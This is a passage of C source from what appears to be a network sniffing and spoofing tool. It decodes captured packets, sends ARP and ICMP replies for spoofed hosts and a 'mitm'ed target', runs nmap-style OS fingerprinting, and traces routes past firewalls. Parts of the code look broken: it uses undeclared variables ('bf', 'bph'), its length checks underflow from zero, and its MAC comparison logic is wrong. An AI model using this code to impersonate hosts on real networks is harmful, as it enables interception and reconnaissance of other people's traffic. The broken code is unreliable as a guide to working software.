				if(cc<0 && errno == EINTR) goto again;
				if(cc<0){
					if(errno == EINVAL && (lseek(bpffd, 0, SEEK_CUR) + bufsize1) < 0){
						(void) lseek(bpffd, 0, 0);
						goto again;
					}
					printf("Opps: read error as %s\n", strerror(errno));
					exit(1);
				}

				//loop through packet
				bf = buf1;
				ep = bp + cc;
	
				while(bp < ep){
					register int caplen, hdrlen;
					caplen = bhp->bh_caplen;
					hdrlen = bph->bh_hdrlen;
				
					memcpy(tsd->pkt, bp+18, caplen);
					bp += BPF_WORDALIGN(hdrlen + caplen);
					tsd->ppkt = tsd->pkt;
					tsd->caplen = caplen;
						
					tptr[(int)tnum].thread_count++;
					if(v>1)printf("<<<<Captured %d of %d bytes by thread %d (tid %ld) total for thread %ld>>>>\n", caplen, hdrlen, tnum, (long int)tptr[tnum].thread_tid, tptr[tnum].thread_count);
					processpacket(); //packet stored in tsd
					
				}
			}
		}
		else usleep(100);
		
	}
	//shouldnt reach here
	printf("Opps: whats going on here..... something fucked up in OSX sniffing loop");
	free(buf1);
	exit(1);
	#endif


}

static void getpacket_once(void)
{
	//create key to tsd data
	if(pthread_key_create(&p_key, p_destructor) != 0){
		printf("Opps: pthread_key_create error\n");
		exit(1);
	}
}

static void p_destructor(void *ptr)
{
	free(ptr);
}

static void doaddresses_once(void)
{
	//count the number of IP addresses from the netmask :)
	unsigned char *nbytes;
        u_char *sbytes;
	int temp, a;
	maskcount = 0;
        
        nbytes = (unsigned char *)&netmask;
        for(a=0; a<4; a++){
               	temp = (256 - (nbytes[a]));
                if(temp){
                	if(!maskcount){
                        	maskcount = temp;
                        }
                	else maskcount *= temp;
		}
	}
	bcastaddr = (~netmask) + localnet;
	sbytes = (u_char *)&bcastaddr;

                                                                      
	if(v>1)printf("Broadcast: %d.%d.%d.%d\n", sbytes[0], sbytes[1], sbytes[2], sbytes[3]);
	if(v>1)printf("IP Address count from netmask: %u\n", maskcount);
}

void processpacket(void)
{
	//core function for decoding packets
	
	u_int16_t type, arpop;
	u_int8_t iptype, dhcptype, icmptype, tcptype;
	struct udp_ports udpports;
	Packet *tsd;

	u_int16_t handle_ETHERNET(void);
	u_int16_t handle_ARP(void);
	u_int8_t handle_ICMP(void);
	u_int8_t handle_DHCP(void);
	u_int8_t handle_IP(void);
	u_int8_t handle_TCP(void);
	
	struct udp_ports handle_UDP(void);
	int handle_ARPrequest(void);
	int handle_ARPreply(void);
	int handle_DHCPdiscover(void);
	int handle_DHCPoffer(void);
	int handle_DHCPrequest(void);
	int handle_DHCPdecline(void);
	int handle_DHCPack(void);
	int handle_DHCPnack(void);
	int handle_DHCPrelease(void);
	int handle_DHCPinform(void);
	int handle_ICMPECHOREQUEST(void);
	int handle_ICMPUNREACH(void);
	int handle_ICMPECHOREPLY(void);
	int handle_ICMPTIMEEXCEED(void);
	int handle_udpDNS(void);
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	type = handle_ETHERNET();
	if(v>1)printf("\n");
	

	//recode as switch should be quicker than if else
	if(ntohs(type) == ETHERTYPE_IP){
		iptype = handle_IP();
		switch(iptype){
			case IPTYPE_TCP: tcptype = handle_TCP();
					 if(tcptype != 0){
						 printf("Opps: tcptype error\n");
						 exit(1);
					 }
					 goto END;
			
			case IPTYPE_UDP: udpports = handle_UDP();
					if(udpports.err == 1){
						printf("UDP packet error... packet dropped\n"); //goto end or someting
						goto END;
				
					}
					if((udpports.src == 67 || udpports.src == 68) && (udpports.dst == 67 || udpports.dst == 68)){
						dhcptype = handle_DHCP();
						if(dhcptype == 255){
							if(v)printf("DHCP packet error... packet dropped\n");

							goto END;
						}
						switch(dhcptype){
							case DHCPDISCOVER: if(handle_DHCPdiscover() !=0){
										   printf("Opps: dhcpdiscover error\n");
									   }
									   goto END;
	
							case DHCPOFFER:	if(handle_DHCPoffer() != 0){
										printf("Opps: dhcpoffer error\n");
									}
									goto END;
	
							case DHCPREQUEST: if(handle_DHCPrequest() != 0){
										  printf("Opps: dhcprequest error\n");
									  }
									  goto END;

							case DHCPDECLINE: if(handle_DHCPdecline() != 0){
										  printf("Opps: dhcpdecline error\n");
									  }
									  goto END;

							case DHCPACK:	if(handle_DHCPack() !=0){
										printf("Opps: dhcpack error\n");
									}
									  goto END;
	
							case DHCPNACK: 	if(handle_DHCPnack() !=0){
									       printf("Opps: dhcpnack error\n");
								       	}
									goto END;

							case DHCPRELEASE: if(handle_DHCPrelease() !=0){
										  printf("Opps: dhcprelease error\n");
									  }
									  goto END;

							case DHCPINFORM: if(handle_DHCPinform() != 0){
										 printf("Opps: dhcpinform error\n");
									 }
									 goto END;

							default: printf("Unknown DHCP type %d\n",dhcptype);
								 goto END;
						}
						goto END;
					}
				
					else if((udpports.src == 53) || (udpports.dst == 53)){
						//NOT INCLUDED IN THIS RELEASE
						if(handle_udpDNS() != 0){
							printf("Opps: handle_udpdns error\n");
						}
						goto END;
					}
			
					else {
						//printf("Unknown UDP packet type\n");
						goto END;
					}
			
			case IPTYPE_ICMP: 
					icmptype = handle_ICMP();
				  	switch(icmptype){
						case ICMP_ECHOREPLY: if(handle_ICMPECHOREPLY() !=0){
									     printf("Opps: icmp echo reply error\n");
								     }
								     goto END;

						case ICMP_UNREACH:
								     //Used for UDP port unreach
								     if(handle_ICMPUNREACH() != 0){
										printf("Opps: icmp unreach error\n");
								     }
								     //if(v>1)printf("icmp unreach\n");
								     goto END;

						case ICMP_SOURCEQUENCH: if(v>1)printf("icmp source quence\n");
									goto END;

						case ICMP_REDIRECT: if(v>1)printf("icmp redirect\n");
								    goto END;

						case ICMP_ECHO: if(handle_ICMPECHOREQUEST() !=0){
									printf("Opps: icmp echo request error\n");
								}
								goto END;

						case ICMP_TIMEEXCEED: if(handle_ICMPTIMEEXCEED() !=0){
									printf("Opps: ICMPTIMEEXCEED error\n");
									}
								      goto END;

						case ICMP_PARAMPROB: if(v>1)printf("icmp param prob\n");
								     goto END;

						case ICMP_TIMESTAMP: if(v>1)printf("icmp time stamp\n");
								     goto END;

						case ICMP_TIMESTAMPREPLY: if(v>1)printf("icmp time stamp reply\n");
									  goto END;
	
						case ICMP_INFOREQUEST: if(v>1)printf("icmp info request\n");
								       goto END;

						case ICMP_INFOREPLY: if(v>1)printf("icmp info reply\n");
								     goto END;

						case 255: printf("Opps: ICMP packet decode error\n");
							  goto END;
							  
						default: printf("icmp unknown type 0x%.2x\n", icmptype);
							 goto END;
					  }
			default: if(v>1) printf("Unknown IP type 0x%.2x\n",(int)iptype);
					 goto END;
		}
	}
	
	if(ntohs(type) == ETHERTYPE_ARP){
	 	arpop = handle_ARP();
		switch(arpop){
			case ARPOP_REQUEST: 	/*request to resolve address */
						handle_ARPrequest();
						if(v)printf("\n");
						goto END;
	       	
			case ARPOP_REPLY: 	/* response to previous request */
						if(handle_ARPreply() != 0){
							printf("Opps: handle_ARPreply error\n");
						}
						if(v)printf("\n");
						goto END;
		
			case ARPOP_REVREQUEST:
						printf(" ARP request protocol\n");/* request protocol address given hardware */
						goto END;
		
			case ARPOP_REVREPLY:
						printf(" ARP response protocol\n");/* response giving protocol address */
						goto END;
			
			case ARPOP_INVREQUEST:
						printf(" ARP request identify peer\n");/* request to identify peer */
						goto END;
		
			case ARPOP_INVREPLY:
						printf(" ARP response identifying peer\n");/* response identifying peer */
						goto END;
		
			default:		if(v>1) printf(" Unknown ARP Optype 0x%.2x\n",(int)arpop);
						goto END;
		}
	}
		
	if(ntohs(type) == ETHERTYPE_REVARP){
		if(v>1)printf("Decode Reverse ARP\n");
		goto END;
	}
	
	END:
	//end of packet gap
	if(v==2)printf("\n");
}


u_int16_t handle_ETHERNET(void)
{

	struct ether_header *eptr;
	Packet *tsd;
	u_char *s;
	u_char *d;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	eptr = (struct ether_header *) tsd->pkt;
	s = (u_char *)&eptr->ether_shost;
	d = (u_char *)&eptr->ether_dhost;
	
	if(v>1)printf("ETHER src: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x", s[0], s[1], s[2], s[3], s[4], s[5]);
      	if(v>1)printf(" dst: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x", d[0], d[1], d[2], d[3], d[4], d[5]);

	if (ntohs (eptr->ether_type) == ETHERTYPE_IP){
	if(v>1)	printf("Type H:0x%x D:%d (IP)", ntohs(eptr->ether_type), ntohs(eptr->ether_type));
	}
	
	else  if (ntohs (eptr->ether_type) == ETHERTYPE_ARP){
	if(v>1)	printf("Type H:0x%x D:%d (ARP)", ntohs(eptr->ether_type), ntohs(eptr->ether_type));
	}
	
	else  if (ntohs (eptr->ether_type) == ETHERTYPE_REVARP){
	if(v>1)	printf("Type H:0x%x D:%d (RARP)",ntohs(eptr->ether_type), ntohs(eptr->ether_type));
	}
	
	else {
	if(v>1)	printf("Type H:0x%x D:%d (?)",ntohs(eptr->ether_type), ntohs(eptr->ether_type));
	}
	
	return(eptr->ether_type);
}

u_int16_t handle_ARP(void)
{
	struct my_arp *arp;
	struct ether_header *eptr;
	u_int length = 0;
	Packet *tsd;
	unsigned char *sbytes, *dbytes;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	eptr = (struct ether_header *) tsd->pkt;
	
	sbytes = (unsigned char *)&(eptr->ether_shost);
	dbytes = (unsigned char *)&(eptr->ether_dhost);

	arp = (struct my_arp*)(tsd->pkt + sizeof(struct ether_header));
	length -= sizeof(struct ether_header);
	
	//printf("lenght %u", length);
	//check length of packet
	if(length < sizeof(struct my_arp)){
		if(v>1)printf("Opps: Truncated ARP packet %d.... packet dropped\n", length);
		drop++;
		return(-1);//255 might have problems
	}
	
	if(v==1)printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> %.2x:%.2x:%.2x:%.2x:%.2x:%.2x ARP Opcode: %x ", sbytes[0], sbytes[1], sbytes[2], sbytes[3], sbytes[4], sbytes[5], dbytes[0], dbytes[1], dbytes[2], dbytes[3], dbytes[4], dbytes[5], ntohs(arp->arp_opcode));
	if(v>1)printf("ARP HWtype: %d, Proto: %d, Hsize: %d, Psize: %d Opcode: %d", ntohs(arp->arp_type), arp->arp_proto, arp->arp_hsize, arp->arp_psize, ntohs(arp->arp_opcode));

	return(ntohs(arp->arp_opcode));
}

int handle_ARPrequest(void)
{
	unsigned int convert32(char *, int, int, int , int); 
	int startARPreply(unsigned int);
	Packet *tsd; 
	struct my_arpops *arpo;
	unsigned int rip;
	PMT p_curr;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	arpo = (struct my_arpops*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_arp));

	if(v)printf(" ARP request for %d.%d.%d.%d's MAC addr from %d.%d.%d.%d", arpo->ar_tpa[0], arpo->ar_tpa[1], arpo->ar_tpa[2], arpo->ar_tpa[3], arpo->ar_spa[0], arpo->ar_spa[1], arpo->ar_spa[2], arpo->ar_spa[3]); //target MAC addr

	rip = convert32(arpo->ar_tpa, 0, 1,2,3);
	
	p_curr = mtpoint;
	if(p_curr == NULL){
		//linked list empty so no need to reply
		return(0);
	}
	
	while((p_curr != NULL) && (p_curr->ipaddress != ntohl(rip))){
		//printf("no match MAC loop\n");
		p_curr = (PMT) p_curr->nextmt;
	}
		
	if(p_curr == NULL){
		//printf("no match found ARP request discarded\n");
		return(0);
	}
	else{
		if(v)printf("MAC compare passed sending arp reply\n");
		if(startARPreply(rip) != 0){
			printf("Opps: startarpreply error\n");
			exit(1);
		}
		return(0);
	}

}

int handle_ARPreply(void)
{
	unsigned int convert32(char *, int, int, int, int);
	Packet *tsd;
	struct my_arpops *arpo; 
	PMT p_curr;
		
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	arpo = (struct my_arpops*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_arp));
	
	//if(arpscanstarted) {
		//printf("%d.%d.%d.%d has %x:%x:%x:%x:%x:%x", arpo->ar_spa[0], arpo->ar_spa[1], arpo->ar_spa[2], arpo->ar_spa[3], arpo->ar_sha[0], arpo->ar_sha[1], arpo->ar_sha[2], arpo->ar_sha[3], arpo->ar_sha[4], arpo->ar_sha[5]);
		//arprecvcount++;
	//}
	if(v) printf(" ARP reply from %d.%d.%d.%d to %d.%d.%d.%d",arpo->ar_spa[0], arpo->ar_spa[1], arpo->ar_spa[2], arpo->ar_spa[3], arpo->ar_tpa[0], arpo->ar_tpa[1], arpo->ar_tpa[2], arpo->ar_tpa[3]); //src IP to dst ip
	if(arpscanstarted){
		if(addmacip(convert32(arpo->ar_spa, 0,1,2,3), arpo->ar_sha)!=0){
			printf("Opps: addmacip error\n");
			exit(1);
		}
		//printf("\n");
		return(0);
	}
	if(!portscanstarted){
		if(getdestmacaddr){
			p_curr = mtpoint;
			if(p_curr == NULL){
				//linked list empty
				return(0);
			}
	
			while((p_curr != NULL)  && (p_curr->srcmac[0] != arpo->ar_tha[0]) && (p_curr->srcmac[1] != arpo->ar_tha[1]) && (p_curr->srcmac[2] != arpo->ar_tha[2]) && (p_curr->srcmac[3] != arpo->ar_tha[3]) && (p_curr->srcmac[4] != arpo->ar_tha[4]) && (p_curr->srcmac[5] != arpo->ar_tha[5])){
				//printf("no match MAC loop\n");
				p_curr = (PMT) p_curr->nextmt;
			}

			if(p_curr == NULL){
				printf("no match found ARP reply discarded\n");
				return(0);
			}
			else{
				if(v)printf("\nMAC compare passed adding entry into arp cache\n");
				if((arpo->ar_spa[0] == 0) && (arpo->ar_spa[1] == 0) && (arpo->ar_spa[2] == 0) && (arpo->ar_spa[3] == 0))
				{
					printf("Opps: arp source protocol addr error\n");
					return(0);
				}
				if((arpo->ar_sha[0] == 0) && (arpo->ar_sha[1] == 0) && (arpo->ar_sha[2] == 0) && (arpo->ar_sha[3] == 0) && (arpo->ar_sha[4] == 0) && (arpo->ar_sha[5] == 0)){
					printf("Opps: arp source hardware addr error\n");
					return(0);
				}
	
				if(addmacip(convert32(arpo->ar_spa, 0,1,2,3), arpo->ar_sha)!=0){
					printf("Opps: addmacip error\n");
					exit(1);
				}
				if(v)printf("arp cache updated\n");
				arpcache = 1;
				return(0);
			}
			return(0);
		}	
		return(0);
	}
	return(0);
}
u_int8_t handle_ICMP(void)
{
	Packet *tsd;
	struct my_icmp *icmp;
	u_int length = 0;
	u_int8_t type;
		if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}


	icmp = (struct my_icmp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip));
	if(length <sizeof(struct my_icmp)){
		if(v>1)printf("Opps: Truncated ICMP %d.... packet dropped\n", length);
		drop++;
		return(-1);
	}

	type = icmp->type;
	//check checksum b4 returning
	
	return(type);
}
	
int handle_ICMPUNREACH(void)
{
	//alot of this code has been ripped from nmap
	//thanks fyodor
	Packet *tsd;
	int df = 0;
	int i;
	struct my_ip *ip;
	struct my_ip *ip2;
	struct my_udp *udp;
	struct icmp *icmp; //use systems icmp stucture not our own
	char ipidvalue[128];
	char ripckvalue[128];
	char uckvalue[128];
	char datvalue[128];
	unsigned short checksum;
	unsigned short *checksumptr;
	unsigned char *datastart, *dataend;
	extern unsigned short in_cksum(u_int16_t *ptr,int nbytes);
	extern void *safe_zalloc(int size);
	struct AVal *AVs;
	static int numtests = 10;
	int current_testno = 0;
	struct AVal *AVpe, *AVpf, *AVpg; 
	if(osdetect || portzerotest){
		if((tsd = (pthread_getspecific(p_key))) == NULL){
			printf("Opps: pthread_getspecific error\n");
			exit(1);
		}
		ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	
		icmp = (struct icmp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct ip));
		//use nmap way of doing things
		ip2 = (struct my_ip*) ((char *)icmp + 8);
		udp = (struct my_udp*) ((char *)ip2 + 20);

		if(pu){
			if(!purec) purec = 1;
			else return(0);

			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));	
			FPs[testcounter]->name = "PU";
		
			AVs = (struct AVal *) safe_zalloc(numtests * sizeof(struct AVal));
			for(i=0; i < numtests - 1; i++)
				AVs[i].next = &AVs[i+1];
	
			AVs[current_testno].attribute = "Resp";
			strcpy(AVs[current_testno].value, "Y");
			//printf("resp currtest = %d", current_testno);
			current_testno++;
		
			//detect DF bit
			AVs[current_testno].attribute = "DF";
			if(ntohs(ip->ip_off & 0x4000)){
	        		df = 1;
				strcpy(AVs[current_testno].value,"Y");
			}
	        	else {
				df = 0;
				strcpy(AVs[current_testno].value, "N");
			}
			current_testno++;
		
			AVs[current_testno].attribute = "TOS";
			sprintf(AVs[current_testno].value, "%hX", ip->ip_tos);
			current_testno++;

			/* Now we look at the IP datagram length that was returned, some
			   machines send more of the original packet back than others */
			AVs[current_testno].attribute = "IPLEN";
			sprintf(AVs[current_testno].value, "%hX", ntohs(ip->ip_len));
			current_testno++;
		
			AVs[current_testno].attribute = "RID";
			if (ntohs(ip2->ip_id) == 0){
				strcpy(AVs[current_testno].value, "0");
				strcpy(ipidvalue, "0");
			}
			else if (ip2->ip_id == ntohs(puid)){
				strcpy(AVs[current_testno].value, "E"); /* The "expected" value */
				strcpy(ipidvalue, "E"); /* The "expected" value */
			}

			else {
				strcpy(AVs[current_testno].value, "F"); /* They fucked it up */
				strcpy(ipidvalue, "F"); /* They fucked it up */
			}
			current_testno++;


			AVs[current_testno].attribute = "RIPCK";
			/* Thanks to some machines not having struct ip member ip_sum we
			   have to go with this BS */
			checksumptr = (unsigned short *)   ((char *) ip2 + 10);
			checksum =   *checksumptr;

			if (checksum == 0){
				strcpy(AVs[current_testno].value, "0");
				strcpy(ripckvalue, "0");
			}
			else {
				*checksumptr = 0;
			  	if (in_cksum((unsigned short *)ip2, 20) == checksum) {
					strcpy(AVs[current_testno].value, "E"); /* The "expected" value */
					strcpy(ripckvalue, "E");
			  	} 
				else {
					strcpy(AVs[current_testno].value, "F"); /* They fucked it up */
					strcpy(ripckvalue, "F");
				}
				*checksumptr = checksum;
			}
			current_testno++;
	
			AVs[current_testno].attribute = "UCK";
			if (udp->chksum == 0){
				strcpy(AVs[current_testno].value, "0");
				strcpy(uckvalue, "0");
			}
			else if (udp->chksum == udpck){
				strcpy(AVs[current_testno].value, "E"); /* The "expected" value */
				strcpy(uckvalue, "E");
			}
			else {
				strcpy(AVs[current_testno].value, "F"); /* They fucked it up */
				strcpy(uckvalue, "F");
			}
			current_testno++;

			datastart = ((unsigned char *)udp) + 8;
			dataend = (unsigned char *)  ip + ntohs(ip->ip_len);

			while(datastart < dataend) {
				if (*datastart != patternbyte) break;
		  		datastart++;
			}
			AVs[current_testno].attribute = "DAT";
			if (datastart < dataend){
				strcpy(AVs[current_testno].value, "F"); /* They fucked it up */
				strcpy(datvalue, "F");
			}
			else{
				strcpy(AVs[current_testno].value, "E");
				strcpy(datvalue, "E");
			}
			AVs[current_testno].next = NULL;


			printf("PU(Resp=Y%%DF=%s%%TOS=%hX%%IPLEN=%hX%%RIPTL=%hX%%RID=%1s%%RIPCK=%1s%%UCK=%1s%%ULEN=%hX%%DAT=%1s)\n", df ? "Y" : "N", ip->ip_tos, ntohs(ip->ip_len), ntohs(ip2->ip_len), ipidvalue, ripckvalue, uckvalue, ntohs(udp->udp_length), datvalue);
			FPs[testcounter]->results = AVs;
			testcounter++;
			//PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
			pureply = 1;

		}
		else if(p5){
			PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P5";

                        AVpe = (struct AVal *) safe_zalloc(1 * sizeof(struct AVal));
                        AVpe[0].next = NULL;

                        AVpe[0].attribute = "Resp";
                        strcpy(AVpe[0].value, "Y");

			printf("P5(Resp=Y)\n");
			PFPs[portzerotestcounter]->results = AVpe;
                        portzerotestcounter++;
			p5reply = 1;
		}

		else if(p6){
			PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P6";

                        AVpf = (struct AVal *) safe_zalloc(1 * sizeof(struct AVal));
                        AVpf[0].next = NULL;

                        AVpf[0].attribute = "Resp";
                        strcpy(AVpf[0].value, "Y");

                        printf("P6(Resp=Y)\n");
			PFPs[portzerotestcounter]->results = AVpf;
                        portzerotestcounter++;
			p6reply = 1;
		}

		else if(p7){
		        PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P7";

                        AVpg = (struct AVal *) safe_zalloc(1 * sizeof(struct AVal));
                        AVpg[0].next = NULL;

                        AVpg[0].attribute = "Resp";
                        strcpy(AVpg[0].value, "Y");	
			PFPs[portzerotestcounter]->results = AVpg;
			printf("P7(Resp=Y)\n");
			p7reply = 1;
		}
	}
	return(0);
}

int handle_ICMPECHOREPLY(void)
{
	extern int getinitttl(int);
	Packet *tsd;
	struct my_icmpecho *iecho;
	struct my_ip *ip;
	struct ether_header *ether;
	u_int length = 0;
	u_char *d, *s, *m;
	PMT p_curr;
	int initttl = 0;
	int df = 0;
	u_int off = 0;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	ether = (struct ether_header*)(tsd->pkt);
	
	s = (unsigned char *)&(ip->ip_src);
	d = (unsigned char *)&(ip->ip_dst);
	m = (u_char *)&(ether->ether_shost);	
	off = ntohs(ip->ip_off);
	if(off & IP_DF){
	        df = 1;
        }
        else {
        	df = 0;
        }
	initttl = getinitttl(ip->ip_ttl);
	
	iecho = (struct my_icmpecho*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp));
	if(length <sizeof(struct my_icmpecho)){
		if(v>1)printf("Opps: Truncated ICMP %d.... packet dropped\n", length);
		drop++;
		return(-1);
	}
	//rip out ip addrs for full packet detail
	//if(v)printf("%d.%d.%d.%d -> %d.%d.%d.%d echo reply id: %d seq: %d\n", s[0], s[1], s[2], s[3], d[0], d[1], d[2], d[3], iecho->id, iecho->seq);

	if(icmpport || onlyicmpping || icmptrace){
		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("Opps: mtpoint == null\n\n");
			return(0);
		}
		
		while(p_curr != NULL && p_curr->ipaddress != ip->ip_dst){
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			//printf("packet not for us\n");
			return(0);
		}
		
		if(p_curr->ipaddress == ip->ip_dst){
					if((v || onlyicmpping) && !icmptrace){
				if(suborbroad || multicastmac){
					printf("reply %d.%d.%d.%d@%.2x:%.2x:%.2x:%.2x:%.2x:%.2x ttl: %d, %sseq: %d id: %d (%d.%d.%d.%d)\n", s[0], s[1], s[2], s[3], m[0], m[1], m[2], m[3], m[4], m[5], ip->ip_ttl, df ? "DF " : "", iecho->seq, iecho->id, d[0], d[1], d[2], d[3]);
				}
				
				else printf("reply %d.%d.%d.%d ttl: %d, init ttl: %d, seq: %d id: %d %s(%d.%d.%d.%d)\n", s[0], s[1], s[2], s[3], ip->ip_ttl, initttl, iecho->seq, iecho->id, df ? "DF " : "", d[0], d[1], d[2], d[3]);
			}
			if(icmptrace){
				hopcount++;
				if(!targetlocated){
					if(multicastmac) printf("%d  %d.%d.%d.%d@%.2x:%.2x:%.2x:%.2x:%.2x:%.2x Echo reply ttl: %d, init ttl: %d, seq: %d id: %d %s(%d.%d.%d.%d)\n", hopcount, s[0], s[1], s[2], s[3], m[0], m[1], m[2], m[3], m[4], m[5], ip->ip_ttl, initttl, iecho->seq, iecho->id, df ? "DF " : "", d[0], d[1], d[2], d[3]);
					else printf("%d  %d.%d.%d.%d  Echo reply ttl: %d, init ttl: %d, seq: %d id: %d %s(%d.%d.%d.%d)\n", hopcount, s[0], s[1], s[2], s[3], ip->ip_ttl, initttl, iecho->seq, iecho->id, df ? "DF " : "", d[0], d[1], d[2], d[3]);
				}
				targetlocated = 1;
				cleanup(0);
			}
			icmpechorec++;
			start = 1;
		}
		else {
			if(v>1)printf("icmp not match 0x%x 0x%x\n", p_curr->ipaddress, ip->ip_src);
			return(0);
		}
	}
	else if(v){
		printf("%d.%d.%d.%d->%d.%d.%d.%d  Echo reply ttl: %d, init ttl: %d, seq: %d id: %d %s\n", s[0], s[1], s[2], s[3], d[0], d[1], d[2], d[3], ip->ip_ttl, initttl, iecho->seq, iecho->id, df ? "DF " : "");
		
	}
	return(0);
}

int handle_ICMPTIMEEXCEED(void)
{
	Packet *tsd;
	struct my_ip *ip;
	struct in_addr sa;
	struct ether_header *ether;
	extern int getinitttl(int);
	u_char *d, *s, *m;
	int posexceedmatch = 0;
	PMT p_curr;
	int initttl = 0;
	int df = 0;
	u_int off;
	

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	ether = (struct ether_header*)(tsd->pkt);
	s = (unsigned char *)&(ip->ip_src);
	d = (unsigned char *)&(ip->ip_dst);
	m = (u_char *)&(ether->ether_shost);

	//icmp = (struct my_icmp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	
	initttl = getinitttl(ip->ip_ttl);

	off = ntohs(ip->ip_off);
	if(off & IP_DF){
		df = 1;
        }
        else {
		df = 0;
        }
	
	if(icmptrace){
		if(!inet_aton((char *)hostname, &sa)){
                	printf("\nOpps: %s is a invalid ip address\n", hostname);
	                exit(1);
        	}
	
		//printf("ipsrc 0x%x sa.addr 0x%x\n", ip->ip_src, sa.s_addr);
	
		//check packet to see if from destinatino
		if((u_int32_t)ip->ip_src == (u_int32_t)sa.s_addr){
			//printf("match found\n");
			//source matches target
			posexceedmatch = 1;
		}

		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("Opps: mtpoint == null\n\n");
			return(0);
		}
		
		while(p_curr != NULL && p_curr->ipaddress != ip->ip_dst){
			p_curr = (PMT) p_curr->nextmt;
		}
			
		if(p_curr == NULL){
			//printf("packet not for us\n");
			return(0);
		}
		
		if(p_curr->ipaddress == ip->ip_dst){
			//dest match one of our spoofed hosts
			//confirm exceedmatch
			if(posexceedmatch) exceedmatch = 1;
		
			
			hopcount++;
			if(icmptrace && multicastmac)printf("%d  %d.%d.%d.%d@%.2x:%.2x:%.2x:%.2x:%.2x:%.2x Time exceed ttl: %d init ttl: %d %s(%d.%d.%d.%d)\n", hopcount, s[0], s[1], s[2], s[3], m[0],m[1],m[2],m[3],m[4],m[5], ip->ip_ttl, initttl, df ? "DF " : "",  d[0], d[1], d[2], d[3]);
			else if(icmptrace)printf("%d  %d.%d.%d.%d  Time exceed ttl: %d init ttl: %d %s(%d.%d.%d.%d)\n", hopcount, s[0], s[1], s[2], s[3], ip->ip_ttl, initttl, df ? "DF " : "",  d[0], d[1], d[2], d[3]);
		
			if(icmptrace && exceedmatch) {
				printf("\nAs a guess the target is blocking ICMP echo requests but ICMP time exceeds are\nstill allowed to slip back past the firewall configuration....\nCheck out Firewalk by Mike Schiffman from www.packetfactory.net for more info\non scanning past a firewall\n");
				cleanup(0);
			}
		}
	return(0);
	}
	else{
		if(v) printf("%d.%d.%d.%d->%d.%d.%d.%d  Time exceed ttl: %d init ttl: %d %s\n", s[0], s[1], s[2], s[3], d[0], d[1], d[2], d[3], ip->ip_ttl, initttl, df ? "DF " : "");
	}
	return(0);

}


int handle_ICMPECHOREQUEST(void)
{
	Packet *tsd;
	struct my_icmpecho *iecho;
	struct my_ip *ip;
	u_int length = 0;
	PMT p_curr;
	u_char *d, *s;
	int f;
	int startICMPECHOREPLY(void);
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));

	s = (unsigned char *)&(ip->ip_src);
	d = (unsigned char *)&(ip->ip_dst);

	iecho = (struct my_icmpecho*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp));
	if(length <sizeof(struct my_icmpecho)){
		if(v>1)printf("Opps: Truncated ICMP %d.... packet dropped\n", length);
		drop++;
		return(-1);
	}
	
	if(v)printf("%d.%d.%d.%d -> %d.%d.%d.%d echo request id: %d seq: %d\n", s[0], s[1], s[2], s[3], d[0], d[1], d[2], d[3], iecho->id, iecho->seq);

	
	p_curr = mtpoint; //set p_curr to top of ll

	if(p_curr == NULL){
		//linked list empty so no need to reply
		return(0);
	}
	
	
	while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
		//printf("no match IP loop\n");
		p_curr = (PMT) p_curr->nextmt;
	}
		
	if(p_curr == NULL){
		//printf("no match found echo request discarded\n");
		return(0);
	}
	else{
		if(!dontreplytoping)printf("Echo request from %d.%d.%d.%d to %d.%d.%d.%d... one of our machines!!!\n", s[0],s[1],s[2],s[3],d[0],d[1],d[2],d[3]); 
		if(p_curr->type == TARGET){
			printf("ICMP echo request for mitm'ed target\n");
			return(0);
		}
		if(p_curr->type == DNS){
